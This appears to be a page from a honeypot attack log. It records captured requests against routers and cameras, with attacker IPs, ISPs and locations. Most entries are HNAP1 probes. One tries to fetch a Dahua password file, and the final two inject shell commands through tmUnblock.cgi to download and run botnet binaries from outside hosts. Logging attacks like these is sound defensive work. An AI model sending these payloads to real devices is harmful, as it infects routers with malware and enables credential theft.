This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 9826 results (983 pages)

Linksys "The Moon" Worm

[Attack info]
Attacker: 195.181.176.137
Dest. port: 8080
Time: 04/08/2020 00:36:23
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Apulia, Santeramo in Colle (zipcode 70029)
rDNS: host137.dynamic176-181-195.optimaitalia.com
POST /HNAP1/ HTTP/1.0 Content-Length: 331 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWanSettings" Host: 12.187.138.67:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://12.187.138.67:8080/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWanSettings xmlns="http://purenetworks.com/HNAP1/"> </GetWanSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 195.181.176.137
Dest. port: 8080
Time: 04/08/2020 00:36:13
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Apulia, Santeramo in Colle (zipcode 70029)
rDNS: host137.dynamic176-181-195.optimaitalia.com
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Host: 12.187.138.67:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://12.187.138.67:8080/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 195.181.176.137
Dest. port: 8080
Time: 04/08/2020 00:36:13
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Apulia, Santeramo in Colle (zipcode 70029)
rDNS: host137.dynamic176-181-195.optimaitalia.com
POST /HNAP1/ HTTP/1.0 Content-Length: 337 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterSettings" Host: 12.187.138.67:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://12.187.138.67:8080/ authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterSettings xmlns="http://purenetworks.com/HNAP1/"> </GetRouterSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 195.181.176.137
Dest. port: 8080
Time: 04/08/2020 00:36:13
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Apulia, Santeramo in Colle (zipcode 70029)
rDNS: host137.dynamic176-181-195.optimaitalia.com
POST /HNAP1/ HTTP/1.0 Content-Length: 345 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2" Host: 12.187.138.67:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://12.187.138.67:8080/ authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/"> </GetRouterLanSettings2> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 195.181.176.137
Dest. port: 8080
Time: 04/08/2020 00:36:10
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Apulia, Santeramo in Colle (zipcode 70029)
rDNS: host137.dynamic176-181-195.optimaitalia.com
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Host: 12.187.138.67:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://12.187.138.67:8080/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>

Dahua backdoor exploit

[Attack info]
Attacker: 110.83.33.42
Dest. port: 8080
Time: 02/08/2020 02:35:33
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4134 CHINANET-BACKBONE
Location: Fujian, Fuzhou
rDNS: 42.33.83.110.broad.fz.fj.dynamic.163data.com.cn
GET /current_config/passwd HTTP/1.1 Host: 102.252.124.187:8080 referer: http://102.252.124.187:8080/ accept-encoding: gzip, deflate Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Linksys "The Moon" Worm

[Attack info]
Attacker: 91.203.164.218
Dest. port: 8080
Time: 26/07/2020 17:50:54
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS47283 FOP Koval Dmitro Orestovich
Location: Poltava Oblast, Kremenchug (zipcode 39623)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Host: 102.252.124.187:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://102.252.124.187:8080/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 91.203.164.218
Dest. port: 8080
Time: 26/07/2020 17:50:54
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS47283 FOP Koval Dmitro Orestovich
Location: Poltava Oblast, Kremenchug (zipcode 39623)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Host: 102.252.124.187:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://102.252.124.187:8080/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 117.4.243.44
Dest. port: 8080
Time: 23/07/2020 19:02:22
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS7552 Viettel Group
Location: Hanoi, Hanoi
rDNS: localhost
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: python-requests/2.20.0 Host: 164.90.154.158:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F164.90.154.158%2Freaper%2Freap.mpsl%3B+chmod+777+reap.mpsl%3B+.%2Freap.mpsl+Reaper.linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Sta

Linksys "The Moon" Worm

[Attack info]
Attacker: 181.143.101.194
Dest. port: 8080
Time: 22/07/2020 06:57:32
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS13489 EPM Telecomunicaciones S.A. E.S.P.
Location: Antioquia, Medellín (zipcode 050032)
rDNS: static-181-143-101-194.une.net.co
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 200 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: Hello, World Host: 127.0.0.1:8080 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+wget+http%3A%2F%2F51.222.26.189%2Fyakuza.mpsl%3B+chmod+777+yakuza.mpsl%3B+.%2Fyakuza.mpsl%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1